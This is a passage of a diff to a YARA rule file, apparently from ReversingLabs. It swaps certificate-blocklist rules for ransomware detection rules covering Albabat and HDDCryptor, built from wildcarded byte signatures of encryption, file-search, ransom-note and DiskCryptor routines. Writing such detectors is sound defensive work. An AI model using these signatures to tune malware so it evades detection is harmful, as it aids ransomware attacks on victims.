+            ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F8 83 FF ?? 0F
+            84 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B F2 85 F6 74
+        }
+		$encrypt_files_p2 = {
+            6A ?? 8D 45 ?? 50 A1 ?? ?? ?? ?? 2B C6 56 03 C1 50 57 FF 15 ?? ?? ?? ?? 2B 75 ?? 74
+            ?? 8B 8D ?? ?? ?? ?? EB ?? 57 FF 15 ?? ?? ?? ?? C6 45 ?? ?? 33 C0 8B 9D ?? ?? ?? ??
+            BA ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 83 CB ?? 8B 45 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
+            89 95 ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 8D 48 ?? 3B CA 76 ?? C6 85 ?? ?? ?? ?? ?? FF B5
+            ?? ?? ?? ?? 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B 95 ?? ?? ?? ?? C7 85 ??
+            ?? ?? ?? ?? ?? ?? ?? 83 7D ?? ?? 8D 4D ?? 0F 43 4D ?? 3B C2 77 ?? 8D 34 00 89 85 ??
+            ?? ?? ?? 83 FA ?? 8D BD ?? ?? ?? ?? 56 0F 43 BD ?? ?? ?? ?? 51 57 E8 ?? ?? ?? ?? 83
+            C4 ?? 33 C0 66 89 04 37 EB ?? 50 51 C6 85 ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? FF B5 ??
+            ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B C2 8B 8D ?? ?? ?? ?? 2B C1 83 F8 ??
+            72 ?? 83 FA ?? 8D B5 ?? ?? ?? ?? 6A ?? 0F 43 B5 ?? ?? ?? ?? 8D 79 ?? 68 ?? ?? ?? ??
+            89 BD ?? ?? ?? ?? 8D 04 4E 50 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 66 89 04 7E EB ?? 6A ??
+            68 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 6A ?? E8 ??
+            ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8D 45 ?? 0F 43 8D ?? ?? ?? ?? 83 7D
+            ?? ?? 51 0F 43 45 ?? 50 FF 15
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SMACKTECH SOFTWARE LIMITED" and pe.signatures [ i ] . serial == "41:52:16:9f:22:45:4e:d6:04:d0:35:55:b7:af:b1:75" and 1595808000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_01C88Ccbd219500139D1Af138A9E898E : INFO FILE
+rule REVERSINGLABS_Win64_Ransomware_Albabat : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Albabat ransomware."
 		author = "ReversingLabs"
-		id = "e3bd6be6-461c-56fd-8dfd-8205845f731e"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "11941c0d-45fb-5746-bbad-f43f336d4b1d"
+		date = "2024-03-18"
+		modified = "2024-03-18"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L4610-L4626"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "d1acb0a7d6e20158797e77c066be42548cee9293fa94f24f936a95977ac16d91"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win64.Ransomware.Albabat.yara#L1-L139"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "38ec8388b9006f6ab9a397858b89f4bfd7def2ffcf525cfc736abae49bc6034a"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Albabat"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$encrypt_files_p1 = {
+            48 8D 05 ?? ?? ?? ?? 48 89 83 ?? ?? ?? ?? 48 C7 83 ?? ?? ?? ?? ?? ?? ?? ?? C7 83 ??
+            ?? ?? ?? ?? ?? ?? ?? 66 C7 83 ?? ?? 00 00 ?? ?? C7 83 ?? ?? ?? ?? ?? ?? ?? ?? 0F 57
+            F6 0F 11 B3 ?? ?? ?? ?? 48 C7 83 ?? ?? ?? ?? ?? ?? ?? ?? C6 83 ?? ?? ?? ?? ?? 4C 8D
+            83 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 D7 48 85 C0 74 ?? 0F B6 05 ?? ?? ?? ?? 48 8B 0D
+            ?? ?? ?? ?? 48 85 C9 75 ?? FF 15 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 89 C1 48
+            89 05 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 31 D2 FF 15 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ??
+            ?? 48 89 C6 48 89 38 4C 8D 35 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 89 BB ?? ?? ?? ?? 48 C7
+            83 ?? ?? ?? ?? ?? ?? ?? ?? 0F 11 B3 ?? ?? ?? ?? 48 89 F9 E8 ?? ?? ?? ?? 48 89 C6 48
+            89 D7 48 85 C0 74 ?? 48 85 FF 0F 85 ?? ?? ?? ?? 48 89 7C 24 ?? 48 8D 8B ?? ?? ?? ??
+            48 8D 93 ?? ?? ?? ?? 4C 8D 83 ?? ?? ?? ?? 49 89 F1 E8 ?? ?? ?? ?? 48 83 BB ?? ?? ??
+            ?? ?? 0F 84 ?? ?? ?? ?? 48 8B BB ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ?? 48 8B 0D ?? ?? ??
+            ?? 48 85 C9 75 ?? FF 15 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 89 C1 48 89 05 ??
+            ?? ?? ?? 41 B8 ?? ?? ?? ?? 31 D2 FF 15 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 89
+        }
+		$encrypt_files_p2 = {
+            C6 48 89 38 4C 8D 35 ?? ?? ?? ?? 48 83 BB ?? ?? ?? ?? ?? 74 ?? 4C 8B 83 ?? ?? ?? ??
+            48 8B 0D ?? ?? ?? ?? 31 D2 FF 15 ?? ?? ?? ?? 48 8B 8B ?? ?? ?? ?? FF 15 ?? ?? ?? ??
+            48 85 F6 0F 84 ?? ?? ?? ?? 48 89 B3 ?? ?? ?? ?? 4C 89 B3 ?? ?? ?? ?? 4C 8D B3 ?? ??
+            ?? ?? 4C 89 B3 ?? ?? ?? ?? 4C 8D 3D ?? ?? ?? ?? 4C 89 BB ?? ?? ?? ?? 48 8D 05 ?? ??
+            ?? ?? 48 89 83 ?? ?? ?? ?? 48 C7 83 ?? ?? ?? ?? ?? ?? ?? ?? 48 C7 83 ?? ?? ?? ?? ??
+            ?? ?? ?? 48 8D BB ?? ?? ?? ?? 48 89 BB ?? ?? ?? ?? 48 C7 83 ?? ?? ?? ?? ?? ?? ?? ??
+            48 8D 8B ?? ?? ?? ?? 48 8D 93 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B B3 ?? ?? ?? ?? 48 8B
+            93 ?? ?? ?? ?? 4C 8B A3 ?? ?? ?? ?? 48 89 F1 E8 ?? ?? ?? ?? 4D 85 E4 74 ?? 48 8B 0D
+            ?? ?? ?? ?? 31 D2 49 89 F0 FF 15 ?? ?? ?? ?? 4C 89 B3 ?? ?? ?? ?? 4C 89 BB ?? ?? ??
+            ?? 48 8D 05 ?? ?? ?? ?? 48 89 83 ?? ?? ?? ?? 48 C7 83 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D
+            35 ?? ?? ?? ?? 48 89 B3 ?? ?? ?? ?? 48 C7 83 ?? ?? ?? ?? ?? ?? ?? ?? 4C 8D B3 ?? ??
+            ?? ?? 4C 89 B3 ?? ?? ?? ?? 48 C7 83 ?? ?? ?? ?? ?? ?? ?? ?? 48 C7 83 ?? ?? ?? ?? ??
+            ?? ?? ?? 48 8D 8B ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? 48 8B 05 ?? ??
+            ?? ?? 48 83 F8 ?? 0F 85 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 65 48 8B
+            14 25 ?? ?? ?? ?? 48 8B 0C CA 48 8D 89 ?? ?? ?? ?? 48 39 C8 75 ?? 8B 05 ?? ?? ?? ??
+            FF C0 75 ?? 48 8D 0D ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? BA ?? ?? ?? ?? E8
+        }
+		$drop_ransom_note = {
+            48 8D 05 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 48
+            89 B4 24 ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 4C 89 B4 24 ?? ?? ?? ?? 48
+            C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 48 83 BC 24 ?? ?? ?? ?? ?? 74 ?? 4C 8B 84 24 ?? ?? ?? ?? 48 8B 0D ?? ??
+            ?? ?? 31 D2 FF 15 ?? ?? ?? ?? 48 8D B4 24 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? 48 89
+            F1 E8 ?? ?? ?? ?? 48 85 C0 4C 8B 74 24 ?? 74 ?? 48 89 C5 4C 8B 6C 24 ?? E9 ?? ?? ??
+            ?? 4D 8D 0C D1 49 83 C1 ?? 48 C1 E2 ?? 48 F7 DA 4F 8D 14 C2 49 83 C2 ?? 49 C1 E0 ??
+            49 F7 D8 45 31 DB 4C 39 DA 0F 84 ?? ?? ?? ?? 4D 39 D8 0F 84 ?? ?? ?? ?? 4B 8B 34 19
+            4F 8B 34 1A 4C 39 F6 0F 82 ?? ?? ?? ?? 49 83 C3 ?? 4C 39 F6 76 ?? E9 ?? ?? ?? ?? 48
+            8D 15 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 80 BC 24
+            ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 8B AC 24 ?? ?? ?? ?? 4C
+            8B 84 24 ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? 4C 8D 0D ?? ?? ?? ?? 48 8D 8C 24 ??
+            ?? ?? ?? 48 89 DA E8 ?? ?? ?? ?? 4C 8B B4 24 ?? ?? ?? ?? 4C 8B 84 24 ?? ?? ?? ?? 48
+            C7 44 24 ?? ?? ?? ?? ?? 4C 8D 0D ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 4C 89 F2 E8 ??
+            ?? ?? ?? 48 83 BC 24 ?? ?? ?? ?? ?? 74 ?? 48 8B 0D ?? ?? ?? ?? 31 D2 4D 89 F0 FF 15
+            ?? ?? ?? ?? 48 85 ED 74 ?? 48 8B 0D ?? ?? ?? ?? 31 D2 49 89 D8 FF 15 ?? ?? ?? ?? 48
+            8D 9C 24 ?? ?? ?? ?? 48 89 D9 E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 4C 8D 0D ?? ?? ??
+            ?? 41 B8 ?? ?? ?? ?? 48 89 D9 E8 ?? ?? ?? ?? 0F 10 00 0F 11 84 24 ?? ?? ?? ?? 48 8B
+            8C 24 ?? ?? ?? ?? 48 85 C9 74
+        }
+		$change_desktop_wallpaper = {
+            4C 8D 0D ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 48 89 DA E8 ?? ?? ?? ?? 48 83 BC 24 ??
+            ?? ?? ?? ?? 74 ?? 48 8B 0D ?? ?? ?? ?? 31 D2 49 89 D8 FF 15 ?? ?? ?? ?? 4D 85 F6 74
+            ?? 48 8B 0D ?? ?? ?? ?? 31 D2 49 89 F0 FF 15 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D
+            8C 24 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 8D 25 ?? ?? ?? ?? 48 85 C0 4C
+            8B 74 24 ?? 0F 85 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 41 B8 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 80 BC 24 ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 48 8B B4 24 ?? ??
+            ?? ?? 4C 8B AC 24 ?? ?? ?? ?? 4C 8B 84 24 ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? 4C
+            8D 0D ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 48 89 F2 E8 ?? ?? ?? ?? 48 8B 9C 24 ?? ??
+            ?? ?? 4C 8B 84 24 ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? 4C 8D 0D ?? ?? ?? ?? 48 8D
+            8C 24 ?? ?? ?? ?? 48 89 DA E8 ?? ?? ?? ?? 48 83 BC 24 ?? ?? ?? ?? ?? 74 ?? 48 8B 0D
+            ?? ?? ?? ?? 31 D2 49 89 D8 FF 15 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 4C 8B B4 24 ??
+            ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 48 89 DA 4D 89 F0 E8 ?? ?? ?? ?? 83 BC 24 ?? ?? ??
+            ?? ?? 0F 85 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 89 C1 83 E1 ?? 83 F9 ?? 0F 85 ?? ??
+            ?? ?? 48 8D 58 ?? 4C 8B 70 ?? 48 8B 68 ?? 4C 89 F1 FF 55
+        }
+		$find_files_p1 = {
+            4C 8D 0D ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 48 89 DA E8 ?? ?? ?? ?? 48 83 BC 24 ??
+            ?? ?? ?? ?? 74 ?? 48 8B 0D ?? ?? ?? ?? 31 D2 49 89 D8 FF 15 ?? ?? ?? ?? 4D 85 FF 74
+            ?? 48 8B 0D ?? ?? ?? ?? 31 D2 49 89 F0 FF 15 ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ??
+            ?? ?? ?? 66 0F EF C0 F3 0F 7F 84 24 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 48 8D 94 24
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 89 C5 4C 8B 6C 24 ?? 4C 8B
+            74 24 ?? E9 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 31 D2 49 89 F0 E8 ?? ?? ?? ?? 48 8B
+            84 24 ?? ?? ?? ?? 48 8B AC 24 ?? ?? ?? ?? 48 29 E8 48 39 F0 72 ?? 48 8B 8C 24 ?? ??
+            ?? ?? 48 01 E9 31 D2 49 89 F0 E8 ?? ?? ?? ?? 48 01 F5 48 89 AC 24 ?? ?? ?? ?? E9 ??
+            ?? ?? ?? 48 C1 ED ?? 74 ?? 41 BD ?? ?? ?? ?? E9 ?? ?? ?? ?? 49 83 FF ?? 72 ?? 48 85
+            DB 74 ?? 48 8B 84 24 ?? ?? ?? ?? EB ?? 48 8D 8C 24 ?? ?? ?? ?? 48 89 EA 49 89 F0 E8
+            ?? ?? ?? ?? 48 8B AC 24 ?? ?? ?? ?? EB ?? 4C 89 FB 4C 89 F0 4D 85 FF 74 ?? 49 89 DC
+            48 8B 44 D8 ?? 48 85 C0 74 ?? 48 0F BD C0 48 83 F0 ?? EB ?? 45 31 E4 EB ?? B8 ?? ??
+            ?? ?? 49 C1 E4 ?? 49 83 CC ?? 49 29 C4 49 C1 EC ?? 48 8B B4 24 ?? ?? ?? ?? BA ?? ??
+            ?? ?? 48 89 F1 45 31 C0 E8 ?? ?? ?? ?? 48 89 F1 E8 ?? ?? ?? ?? 49 89 C7 49 83 FC
+        }
+		$find_files_p2 = {
+            73 ?? 48 8B 0D ?? ?? ?? ?? 31 D2 4D 89 F8 FF 15 ?? ?? ?? ?? 41 BD ?? ?? ?? ?? E9 ??
+            ?? ?? ?? BA ?? ?? ?? ?? 4C 89 E1 E8 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 8D 68
+            ?? 49 8D 5C 24 ?? 48 8B 8C 24 ?? ?? ?? ?? 48 89 EA 48 89 44 24 ?? E8 ?? ?? ?? ?? 48
+            8B 44 24 ?? F3 41 0F 6F 07 41 0F 10 4F ?? 0F 11 48 ?? F3 0F 7F 40 ?? 49 8D 4C 24 ??
+            48 39 D9 0F 83 ?? ?? ?? ?? 4D 89 E5 4C 8D 60 ?? 49 8D 4D ?? 43 C6 44 2C ?? ?? 48 39
+            CB 0F 82 ?? ?? ?? ?? 43 0F 11 74 2C ?? 43 0F 11 7C 2C ?? 48 C7 44 24 ?? ?? ?? ?? ??
+            4C 89 E1 48 89 DA 48 8B B4 24 ?? ?? ?? ?? 49 89 F0 49 89 E9 E8 ?? ?? ?? ?? 48 89 5C
+            24 ?? BA ?? ?? ?? ?? 48 89 E9 49 89 F0 4D 89 E1 E8 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ??
+            31 D2 4D 89 F8 FF 15 ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ?? BA ?? ?? ?? ?? 4C 89 E9 E8 ??
+            ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 89 C3 48 8D B4 24 ?? ?? ?? ?? 48 89 C1 48 8B
+            54 24 ?? 4D 89 E8 E8
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Raymond Yanagita" and pe.signatures [ i ] . serial == "01:c8:8c:cb:d2:19:50:01:39:d1:af:13:8a:9e:89:8e" and 1593041280 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) ) and ( $drop_ransom_note ) and ( $change_desktop_wallpaper )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_41D05676E0D31908Be4Dead3486Aeae3 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Hddcryptor : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects HDDCryptor ransomware."
 		author = "ReversingLabs"
-		id = "bca4533d-e721-5f23-984a-3b741ca8b53f"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "2c6a8ca3-0f7a-52b7-af6d-74fa9407feca"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L4628-L4644"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "c4905f02c74df6d05b3f9a6fe2c4f5f32a02bb10da4db929314be043be76d703"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.HDDCryptor.yara#L1-L157"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "47915f315bb4956507362f56024f5632cb1bcec569ceaf77fe9d7cb9c25d1d8a"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "HDDCryptor"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$deploy_components = {
+            B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ??
+            ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 66 83 BD ?? ?? ?? ?? ?? 6A ?? 53 0F 85 ?? ?? ?? ?? FF
+            15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B CB E8 ?? ?? ?? ?? 6A ?? 68 ??
+            ?? ?? ?? BA ?? ?? ?? ?? 8B CB 8B F0 E8 ?? ?? ?? ?? 8B F8 6A ?? 0F AF FE 68 ?? ?? ??
+            ?? BA ?? ?? ?? ?? 8B CB E8 ?? ?? ?? ?? 8B F0 6A ?? 0F AF F7 68 ?? ?? ?? ?? BA ?? ??
+            ?? ?? 8B CB E8 ?? ?? ?? ?? 8B F8 6A ?? 0F AF FE 68 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B CB
+            E8 ?? ?? ?? ?? 8B F0 6A ?? 0F AF F7 68 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B CB E8 ?? ?? ??
+            ?? 6A ?? 68 ?? ?? ?? ?? E9 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? BA ??
+            ?? ?? ?? 8B CB E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B CB 8B F0 E8 ??
+            ?? ?? ?? 8B F8 6A ?? 0F AF FE 68 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B CB E8 ?? ?? ?? ?? 8B
+            F0 6A ?? 0F AF F7 68 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B CB E8 ?? ?? ?? ?? 8B F8 6A ?? 0F
+            AF FE 68 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B CB E8 ?? ?? ?? ?? 8B F0 6A ?? 0F AF F7 68 ??
+            ?? ?? ?? BA ?? ?? ?? ?? 8B CB E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8B F8 BA ?? ?? ??
+            ?? 0F AF FE 8B CB E8
+        }
+		$get_shares_info = {
+            E8 ?? ?? ?? ?? 83 C4 ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 35 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? B9 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? FF D6 68 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? EB ?? FF 15 ?? ??
+            ?? ?? 85 C0 75 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4
+            ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? FF D6 8D 44 24 ?? 50 C7 44 24 ??
+            ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ??
+            FF 15
+        }
+		$encrypt_discs = {
+            68 ?? ?? ?? ?? FF 74 24 ?? 0F 57 C0 66 0F 7F 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? FF 15
+            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 33 C9 EB ?? 8D 49 ?? 0F B7 81 ?? ?? ?? ?? 66 89 84 0C ?? ?? ?? ?? 8D 49 ?? 66
+            85 C0 75 ?? 8D 8C 24 ?? ?? ?? ?? 83 C1 ?? 66 8B 41 ?? 8D 49 ?? 66 85 C0 75 ?? A1 ??
+            ?? ?? ?? 89 01 A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41
+            ?? A1 ?? ?? ?? ?? 89 41 ?? 0F B7 05 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 66 89 41
+            ?? 8D 84 24 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF
+            D7 B9 ?? ?? ?? ?? E8
+        }
+		$create_diskcryptor_service = {
+            83 EC ?? 53 55 56 57 68 ?? ?? ?? ?? 33 ED 8B F2 55 55 8B F9 FF 15 ?? ?? ?? ?? 85 C0
+            74 ?? 55 55 55 55 55 FF 74 24 ?? 55 6A ?? 5B 53 6A ?? 68 ?? ?? ?? ?? 56 57 50 FF 15
+            ?? ?? ?? ?? 8B F0 89 5C 24 ?? B8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 44 24 ?? 33
+            C9 89 44 24 ?? 41 8D 44 24 ?? 89 4C 24 ?? 89 44 24 ?? 8D 44 24 ?? 50 53 56 89 4C 24
+            ?? C7 44 24 ?? ?? ?? ?? ?? 89 6C 24 ?? FF 15 ?? ?? ?? ?? 8B C6 5F 5E 5D 5B 83 C4 ??
+            C3
+        }
+		$extract_diskcryptor_from_resources = {
+            81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 53 55 56 8B B4 24 ?? ??
+            ?? ?? 33 C0 57 50 89 54 24 ?? 8B E9 FF 15 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 8B D8 56
+            0F B7 C9 51 53 FF 15 ?? ?? ?? ?? 8B F0 56 53 FF 15 ?? ?? ?? ?? 56 53 8B F8 FF 15 ??
+            ?? ?? ?? 57 89 44 24 ?? FF 15 ?? ?? ?? ?? FF 74 24 ?? 8B F0 E8 ?? ?? ?? ?? 59 FF 74
+            24 ?? 8B D8 56 53 E8 ?? ?? ?? ?? 8B 54 24 ?? 33 FF 83 C4 ?? 8B CF 85 D2 7E ?? 8A 04
+            19 3C ?? 7C ?? 3C ?? 7F ?? 04 ?? 3C ?? 76 ?? 2C ?? 88 04 19 41 3B CA 7C ?? 33 C0 68
+            ?? ?? ?? ?? 66 89 44 24 ?? 8D 44 24 ?? 57 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B F5 66 8B 45
+            ?? 83 C5 ?? 66 3B C7 75 ?? 8D 7C 24 ?? 2B EE 83 EF ?? 33 C9 66 8B 47 ?? 83 C7 ?? 66
+            3B C1 75 ?? 8B CD C1 E9 ?? F3 A5 8B CD 83 E1 ?? F3 A4 8D 7C 24 ?? 83 EF ?? 33 ED 66
+            8B 47 ?? 8D 7F ?? 66 3B C5 75 ?? A1 ?? ?? ?? ?? 8B 54 24 ?? 8B F2 89 07 66 8B 02 83
+            C2 ?? 66 3B C5 75 ?? 8D 7C 24 ?? 2B D6 83 EF ?? 66 8B 47 ?? 83 C7 ?? 66 3B C5 75 ??
+            8B CA 8D 44 24 ?? C1 E9 ?? F3 A5 55 55 6A ?? 55 55 8B CA 83 E1 ?? 68 ?? ?? ?? ?? F3
+            A4 50 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 74 ?? 55 8D 44 24 ?? 50 FF 74 24 ?? 53 56 FF
+            15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 33 C0 40 EB ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33
+            C0 8B 8C 24 ?? ?? ?? ?? 5F 5E 5D 5B 33 CC E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3
+        }
+		$encrypt_files_using_diskcryptor_p1 = {
+            55 8B EC 83 E4 ?? 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ??
+            ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 53 56 57 A1 ?? ?? ?? ?? 33 C4 50 8D 84 24 ?? ??
+            ?? ?? 64 A3 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D3 83 7D ?? ?? 73 ?? B9
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ??
+            ?? ?? ?? 8B 75 ?? BA ?? ?? ?? ?? 8B 4E ?? 8A 01 41 88 02 42 84 C0 75 ?? 8B 4E ?? BA
